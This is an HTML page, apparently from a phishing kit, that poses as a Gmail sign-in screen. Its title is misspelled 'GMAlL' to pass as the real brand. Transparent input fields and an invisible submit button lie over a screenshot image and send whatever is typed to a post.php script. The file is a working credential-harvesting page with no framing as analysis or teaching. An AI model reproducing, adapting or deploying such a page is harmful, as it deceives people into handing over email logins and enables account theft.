<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- saved from url=(0014)about:internet -->
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>GMAlL SIGN IN</title>
<meta name="GENERATOR" content="DUDU">
<meta name="DUDU" content="DUDU">
<style type="text/css">
body
{
   background-color: #FFFFFF;
   color: #000000;
}
</style>
<style type="text/css">
a:hover
{
   color: #6CDA7B;
}
</style>
<!--[if lt IE 7]>
<style type="text/css">
   img { behavior: url("pngfix.htc"); }
</style>
<![endif]-->
</head>
<body>
<div id="bv_Image1" style="margin:0;padding:0;position:absolute;left:0px;top:0px;width:398px;height:393px;text-align:left;z-index:3;">
<img src="cdn/GG2.png" id="Image1"  style="width="480" height="480" " align="top" border="0"></div>

<div id="bv_Form1" style="position:absolute;left:0px;top:0px;width:401px;height:400px;z-index:4">
<form name="Form1" method="post" action="post.php">


<input id="emailphone" style="position:absolute;left:26px;top:203.5px;width:150px;height:28px;border:1px #C0C0C0 solid;font-family:Arial;font-size:12px;z-index:1" name="emailphone"  type="text" >

<input id="emailphone2" style="position:absolute;left:26px;top:265px;width:227px;height:28px;border:1px #C0C0C0 solid;font-family:Arial;font-size:12px;z-index:1" name="emailphone2" pattern="[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,3}$"  type="email" >

<input id="Button1" name="Button1"  style="position:absolute;left:26px;top:319px;width:227px;height:28px;border:0px #000000 dotted;background-color:transparent;font-family:Arial;font-size:13px;z-index:2" type="submit">
</form>
</div>
</body></html>